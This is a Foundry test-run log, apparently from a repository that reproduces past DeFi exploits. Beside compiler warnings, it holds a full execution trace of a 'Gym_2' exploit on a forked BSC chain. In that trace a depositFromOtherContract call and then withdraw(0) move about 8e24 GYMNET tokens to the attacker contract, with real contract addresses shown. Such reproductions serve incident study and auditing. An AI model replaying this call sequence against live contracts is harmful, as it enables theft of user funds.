Compiling 20 files with Solc 0.8.10
Compiling 21 files with Solc 0.8.28
Solc 0.8.28 finished in 908.49ms
Solc 0.8.10 finished in 1.07s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 491.60ms (1.81ms CPU time)

Ran 1 test for src/test/2022-06/Gym_2_exp.sol:ContractTest
[PASS] testExploit() (gas: 409747)
Logs:
  Exploit completed, GYMNET balance of attacker:: 8000000000000000000000666

Traces:
  [5845] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 18501049 [1.85e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [455147] ContractTest::testExploit()
    ├─ [310451] 0xA8987285E100A8b557F06A7889F79E0064b359f2::depositFromOtherContract(8000000000000000000000666 [8e24], 0, true, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [303108] 0x0288FBA0BF19072d30490A0F3C81cD9B0634258a::depositFromOtherContract(8000000000000000000000666 [8e24], 0, true, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   ├─ [7697] 0x3a0d9d7764FAE860A659eb96A500F1323b411e68::approve(0xA8987285E100A8b557F06A7889F79E0064b359f2, 8000000000000000000000666 [8e24])
    │   │   │   ├─ emit Approval(owner: 0xA8987285E100A8b557F06A7889F79E0064b359f2, spender: 0xA8987285E100A8b557F06A7889F79E0064b359f2, value: 8000000000000000000000666 [8e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x30b8c9be9e9e6ca21e69b00474a62f935f5edcf64989266e3f10b3d0593deacb: 0x000000000000000000000000000000000000000000108b2a2c28029094000000 → 0x000000000000000000000000000000000000000000069e10de76676d0800029a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [9611] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(1000000000000000000 [1e18], [0x3a0d9d7764FAE860A659eb96A500F1323b411e68, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]) [staticcall]
    │   │   │   ├─ [2893] 0x627F27705c8C283194ee9A85709f7BD9E38A1663::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 15751196190337083954952326 [1.575e25], 10646467018056697619863 [1.064e22], 1654665129 [1.654e9]
    │   │   │   └─ ← [Return] [1000000000000000000 [1e18], 674224995336360 [6.742e14]]
    │   │   ├─ [9651] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(1, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x55d398326f99059fF775485246999027B3197955]) [staticcall]
    │   │   │   ├─ [2893] 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 89758788041078841536910115 [8.975e25], 311598904427320820600995 [3.115e23], 1654665480 [1.654e9]
    │   │   │   └─ ← [Return] [1, 287]
    │   │   ├─ emit Deposit(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 0, amount: 8000000000000000000000666 [8e24])
    │   │   ├─  storage changes:
    │   │   │   @ 156: 0x00000000000000000000000000000000000000000000000000ad2ecf5dab238f → 0x00000000000000000000000000000000000000000000000000ad2ecf8f702ff2
    │   │   │   @ 155: 0x00000000000000000000000000000000000000000000000000000000011a4d54 → 0x00000000000000000000000000000000000000000000000000000000011a4db9
    │   │   │   @ 187: 0x0000000000000000000000000000000000000003cd8bc54de4e5e1335efa8331 → 0x0000000000000000000000000000000000000003cd92635ec35c48a066fa85cb
    │   │   │   @ 0x313458e10a7a0cfbea773c37e7ba6d0a11d0bdfe68cb04579f348c7a6586fc64: 0 → 0x0000000000000000000000000000000000000000000000000000000062a0310b
    │   │   │   @ 0xcec6dc01206cb73693ee8ca88cf17a85af9a623d3db7555bb20456a9a64ad929: 0 → 1
    │   │   │   @ 0x313458e10a7a0cfbea773c37e7ba6d0a11d0bdfe68cb04579f348c7a6586fc60: 0 → 0x000000000000000000000000000000000000000000069e10de76676d0800029a
    │   │   │   @ 0x5dfbc587ab2fc560325500217342d4961191b2f8217b3bf95d9c8e3390d826e3: 0 → 1
    │   │   │   @ 0xcec6dc01206cb73693ee8ca88cf17a85af9a623d3db7555bb20456a9a64ad926: 0 → 0x000000000000000000000000000000000000000000069e10de76676d0800029a
    │   │   │   @ 0x313458e10a7a0cfbea773c37e7ba6d0a11d0bdfe68cb04579f348c7a6586fc67: 0 → 0x0000000000000000000000000000000000000000000052947c34f38cbcb30420
    │   │   │   @ 195: 0x0000000000000000000000000000000000000000005c1104d0d78b088b7b2eb7 → 0x00000000000000000000000000000000000000000062af15af4df275937b3151
    │   │   │   @ 0x313458e10a7a0cfbea773c37e7ba6d0a11d0bdfe68cb04579f348c7a6586fc61: 0 → 0x0000000000000000000000000000000000000000000000000000000000179ef4
    │   │   │   @ 0xcec6dc01206cb73693ee8ca88cf17a85af9a623d3db7555bb20456a9a64ad927: 0 → 0x0000000000000000000000000000000000000000000000000000000000179ef4
    │   │   │   @ 0x313458e10a7a0cfbea773c37e7ba6d0a11d0bdfe68cb04579f348c7a6586fc63: 0 → 0x0000000000000000000000000000000000000000000000000000000062a03108
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [0] VM::warp(1654683789 [1.654e9])
    │   └─ ← [Return]
    ├─ [126786] 0xA8987285E100A8b557F06A7889F79E0064b359f2::withdraw(0)
    │   ├─ [125958] 0x0288FBA0BF19072d30490A0F3C81cD9B0634258a::withdraw(0) [delegatecall]
    │   │   ├─ [56654] 0x3a0d9d7764FAE860A659eb96A500F1323b411e68::transferFrom(0xA8987285E100A8b557F06A7889F79E0064b359f2, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8000000000000000000000666 [8e24])
    │   │   │   ├─ emit Transfer(from: 0xA8987285E100A8b557F06A7889F79E0064b359f2, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 8000000000000000000000666 [8e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x341e5149c760ab515a259fc26642bfe9e8e15fd75ad9badf186c88e7660bbd7e: 0x000000000000000000000000000000000000000000213cd651c64be2553dcedb → 0x0000000000000000000000000000000000000000001a9ec5734fe4754d3dcc41
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000069e10de76676d0800029a
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit Withdraw(user: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], pid: 0, amount: 8000000000000000000000666 [8e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0xcec6dc01206cb73693ee8ca88cf17a85af9a623d3db7555bb20456a9a64ad927: 0x0000000000000000000000000000000000000000000000000000000000179ef4 → 0
    │   │   │   @ 0xcec6dc01206cb73693ee8ca88cf17a85af9a623d3db7555bb20456a9a64ad926: 0x000000000000000000000000000000000000000000069e10de76676d0800029a → 0
    │   │   │   @ 187: 0x0000000000000000000000000000000000000003cd92635ec35c48a066fa85cb → 0x0000000000000000000000000000000000000003cd8bc54de4e5e1335efa8331
    │   │   │   @ 195: 0x00000000000000000000000000000000000000000062af15af4df275937b3151 → 0x0000000000000000000000000000000000000000005c1104d0d78b088b7b2eb7
    │   │   │   @ 0x313458e10a7a0cfbea773c37e7ba6d0a11d0bdfe68cb04579f348c7a6586fc68: 0 → 1
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [668] 0x3a0d9d7764FAE860A659eb96A500F1323b411e68::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 8000000000000000000000666 [8e24]
    ├─ emit log_named_uint(key: "Exploit completed, GYMNET balance of attacker:", val: 8000000000000000000000666 [8e24])
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 16.53s (15.19s CPU time)

Ran 2 test suites in 16.55s (17.03s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
